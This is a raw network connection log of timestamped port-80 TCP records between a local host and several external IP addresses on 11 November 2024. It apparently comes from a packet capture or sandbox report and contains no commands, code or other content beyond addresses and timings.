                                                                                                Nov 11, 2024 17:02:00.457020998 CET4976080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:01.827131987 CET4976080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:02.844563961 CET4976180192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:02.974334002 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:02.974510908 CET4976180192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:02.982228994 CET4976180192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:02.982302904 CET4976180192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:03.099471092 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.099478006 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.099576950 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.099584103 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.099656105 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.099661112 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.099666119 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.117254019 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.117263079 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.117343903 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.117491961 CET4976180192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:03.124614000 CET8049761199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:03.124792099 CET4976180192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:04.498488903 CET4976180192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:05.515886068 CET4976280192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:05.633136988 CET8049762199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:05.633337975 CET4976280192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:05.638314009 CET4976280192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:05.755698919 CET8049762199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:05.773503065 CET8049762199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:05.773549080 CET8049762199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:05.773576021 CET8049762199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:05.773870945 CET4976280192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:05.775666952 CET4976280192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:05.780761003 CET8049762199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:05.780956030 CET4976280192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:02:05.893106937 CET8049762199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:02:10.953478098 CET4976380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:11.243976116 CET8049763192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:11.244242907 CET4976380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:11.256803989 CET4976380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:11.547210932 CET8049763192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:11.561925888 CET8049763192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:11.561933994 CET8049763192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:11.562102079 CET4976380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:12.762219906 CET4976380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:13.779679060 CET4976480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:14.071285009 CET8049764192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:14.071499109 CET4976480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:14.079031944 CET4976480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:14.370676994 CET8049764192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:14.383464098 CET8049764192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:14.383471012 CET8049764192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:14.383642912 CET4976480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:15.589781046 CET4976480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:16.607150078 CET4976580192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:16.899795055 CET8049765192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:16.900038958 CET4976580192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:16.907685041 CET4976580192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:16.907705069 CET4976580192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:16.907778978 CET4976580192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:17.200143099 CET8049765192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:17.200237989 CET8049765192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:17.200244904 CET8049765192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:17.217278004 CET8049765192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:17.217284918 CET8049765192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:17.217473984 CET4976580192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:18.417315960 CET4976580192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:19.434696913 CET4976680192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:19.728360891 CET8049766192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:19.728579044 CET4976680192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:19.733612061 CET4976680192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:20.025870085 CET8049766192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:20.040266037 CET8049766192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:20.040308952 CET8049766192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:20.040925980 CET4976680192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:20.042746067 CET4976680192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:02:20.335412025 CET8049766192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:02:25.269718885 CET4976780192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:25.609035015 CET8049767154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:02:25.609211922 CET4976780192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:25.616754055 CET4976780192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:25.956140041 CET8049767154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:02:25.956283092 CET8049767154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:02:25.956463099 CET4976780192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:27.118509054 CET4976780192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:28.135914087 CET4976880192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:28.449186087 CET8049768154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:02:28.449521065 CET4976880192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:28.456976891 CET4976880192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:28.770354033 CET8049768154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:02:28.770477057 CET8049768154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:02:28.770688057 CET4976880192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:29.961574078 CET4976880192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:30.979011059 CET4976980192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:31.320051908 CET8049769154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:02:31.320264101 CET4976980192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:31.327910900 CET4976980192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:31.328037977 CET4976980192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:31.669167995 CET8049769154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:02:31.669400930 CET8049769154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:02:31.669634104 CET8049769154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:02:31.669842005 CET8049769154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:02:31.669975042 CET8049769154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:02:31.670134068 CET4976980192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:32.835932970 CET4976980192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:33.855026007 CET4977080192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:34.193614006 CET8049770154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:02:34.193826914 CET4977080192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:34.199379921 CET4977080192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:34.538042068 CET8049770154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:02:34.538172960 CET8049770154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:02:34.538500071 CET4977080192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:34.540329933 CET4977080192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:02:34.879076004 CET8049770154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:02:39.808317900 CET4977180192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:39.942512989 CET804977113.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:39.942692995 CET4977180192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:39.955378056 CET4977180192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:40.088706017 CET804977113.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:40.089220047 CET804977113.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:40.089344978 CET4977180192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:41.459129095 CET4977180192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:41.592518091 CET804977113.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:42.476545095 CET4977280192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:42.612149954 CET804977213.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:42.612344980 CET4977280192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:42.619852066 CET4977280192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:42.753760099 CET804977213.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:42.754322052 CET804977213.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:42.754482985 CET4977280192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:44.130347967 CET4977280192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:44.264269114 CET804977213.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:45.147769928 CET4977380192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:45.282759905 CET804977313.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:45.282974958 CET4977380192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:45.290671110 CET4977380192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:45.290719032 CET4977380192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:45.290772915 CET4977380192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:45.424365044 CET804977313.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:45.424597025 CET804977313.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:45.424603939 CET804977313.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:45.424683094 CET804977313.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:45.425263882 CET804977313.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:47.819310904 CET4977480192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:47.954335928 CET804977413.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:47.954519987 CET4977480192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:47.960872889 CET4977480192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:48.094563007 CET804977413.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:48.096805096 CET804977413.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:48.096812963 CET804977413.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:48.097162008 CET4977480192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:48.099055052 CET4977480192.168.11.2013.248.169.48
                                                                                                Nov 11, 2024 17:02:48.232733011 CET804977413.248.169.48192.168.11.20
                                                                                                Nov 11, 2024 17:02:53.288397074 CET4977580192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:02:53.423619986 CET80497753.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:02:53.423898935 CET4977580192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:02:53.431359053 CET4977580192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:02:53.565392017 CET80497753.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:02:53.566121101 CET80497753.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:02:53.566340923 CET4977580192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:02:54.940516949 CET4977580192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:02:55.074687004 CET80497753.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:02:55.957941055 CET4977680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:02:56.094306946 CET80497763.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:02:56.094495058 CET4977680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:02:56.101978064 CET4977680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:02:56.236474037 CET80497763.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:02:56.236848116 CET80497763.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:02:56.237041950 CET4977680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:02:57.611803055 CET4977680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:02:57.746274948 CET80497763.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:02:58.629240036 CET4977780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:02:58.746421099 CET80497773.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:02:58.746671915 CET4977780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:02:58.754354954 CET4977780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:02:58.754415989 CET4977780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:02:58.871563911 CET80497773.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:02:58.871670961 CET80497773.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:02:58.871678114 CET80497773.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:02:58.871781111 CET80497773.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:02:58.871788025 CET80497773.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:02:58.871793985 CET80497773.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:02:58.871800900 CET80497773.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:02:58.899801970 CET80497773.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:02:58.900013924 CET4977780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:00.267437935 CET4977780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:00.384567022 CET80497773.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:01.284925938 CET4977880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:01.402229071 CET80497783.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:01.402462959 CET4977880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:01.407815933 CET4977880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:01.525127888 CET80497783.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:01.548108101 CET80497783.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:01.548163891 CET80497783.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:01.548410892 CET4977880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:01.550204992 CET4977880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:01.554555893 CET80497783.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:01.554769993 CET4977880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:01.667439938 CET80497783.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:06.778745890 CET4977980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:06.914467096 CET80497793.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:06.914639950 CET4977980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:06.922224045 CET4977980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:07.056539059 CET80497793.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:07.057395935 CET80497793.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:07.057666063 CET4977980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:08.437551022 CET4977980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:08.571746111 CET80497793.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:09.454984903 CET4978080192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:09.572120905 CET80497803.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:09.572304964 CET4978080192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:09.579833031 CET4978080192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:09.696973085 CET80497803.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:09.714870930 CET80497803.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:09.715131998 CET4978080192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:11.093193054 CET4978080192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:11.210284948 CET80497803.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:12.110944986 CET4978180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:12.228080988 CET80497813.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:12.228322983 CET4978180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:12.235996962 CET4978180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:12.236040115 CET4978180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:12.353122950 CET80497813.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:12.353236914 CET80497813.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:12.353374004 CET80497813.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:12.353380919 CET80497813.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:12.353385925 CET80497813.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:12.353389978 CET80497813.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:12.353394985 CET80497813.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:12.371510983 CET80497813.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:12.371650934 CET4978180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:13.748902082 CET4978180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:13.865979910 CET80497813.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:14.766319036 CET4978280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:14.901887894 CET80497823.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:14.902055979 CET4978280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:14.907131910 CET4978280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:15.043754101 CET80497823.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:15.045154095 CET80497823.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:15.045295954 CET80497823.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:15.045526981 CET4978280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:15.047528982 CET4978280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:15.182835102 CET80497823.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:20.246113062 CET4978380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:20.381297112 CET80497833.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:20.381561041 CET4978380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:20.389045954 CET4978380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:20.523310900 CET80497833.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:20.524085999 CET80497833.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:20.524420023 CET4978380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:21.903383017 CET4978380192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:22.037637949 CET80497833.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:22.920804024 CET4978480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:23.037962914 CET80497843.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:23.038193941 CET4978480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:23.045794964 CET4978480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:23.162946939 CET80497843.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:23.180742025 CET80497843.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:23.180989027 CET4978480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:24.559015036 CET4978480192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:24.676091909 CET80497843.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:25.576442957 CET4978680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:25.693824053 CET80497863.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:25.694042921 CET4978680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:25.701711893 CET4978680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:25.701786041 CET4978680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:25.818814039 CET80497863.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:25.818820953 CET80497863.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:25.818916082 CET80497863.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:25.819056034 CET80497863.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:25.819062948 CET80497863.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:25.819067955 CET80497863.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:25.819072962 CET80497863.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:25.837564945 CET80497863.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:25.837786913 CET4978680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:27.214728117 CET4978680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:27.331726074 CET80497863.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:28.232192039 CET4978780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:28.349277020 CET80497873.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:28.349498034 CET4978780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:28.354531050 CET4978780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:28.471616030 CET80497873.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:28.518465042 CET80497873.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:28.518515110 CET80497873.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:28.518727064 CET4978780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:28.520535946 CET4978780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:28.525602102 CET80497873.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:28.525780916 CET4978780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:03:28.637692928 CET80497873.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:03:33.791141987 CET4978880192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:33.908333063 CET804978845.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:33.908494949 CET4978880192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:33.915977001 CET4978880192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:34.074290037 CET804978845.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:34.560483932 CET804978845.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:34.560492039 CET804978845.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:34.560688972 CET4978880192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:35.431649923 CET4978880192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:36.449078083 CET4978980192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:36.566349983 CET804978945.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:36.566509008 CET4978980192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:36.574029922 CET4978980192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:36.732120991 CET804978945.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:36.978610039 CET804978945.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:36.978616953 CET804978945.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:36.978771925 CET4978980192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:38.087294102 CET4978980192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:39.104726076 CET4979080192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:39.222028971 CET804979045.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:39.222181082 CET4979080192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:39.229911089 CET4979080192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:39.229935884 CET4979080192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:39.230006933 CET4979080192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:39.347254992 CET804979045.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:39.347357035 CET804979045.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:39.347487926 CET804979045.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:40.075690985 CET804979045.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:40.075707912 CET804979045.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:40.075896978 CET4979080192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:40.743007898 CET4979080192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:41.760406017 CET4979180192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:41.877855062 CET804979145.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:41.878027916 CET4979180192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:41.883053064 CET4979180192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:42.041465998 CET804979145.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:42.595132113 CET804979145.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:42.595175028 CET804979145.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:42.595444918 CET4979180192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:42.597268105 CET4979180192.168.11.2045.79.252.94
                                                                                                Nov 11, 2024 17:03:42.714520931 CET804979145.79.252.94192.168.11.20
                                                                                                Nov 11, 2024 17:03:47.811136961 CET4979280192.168.11.2043.156.106.109
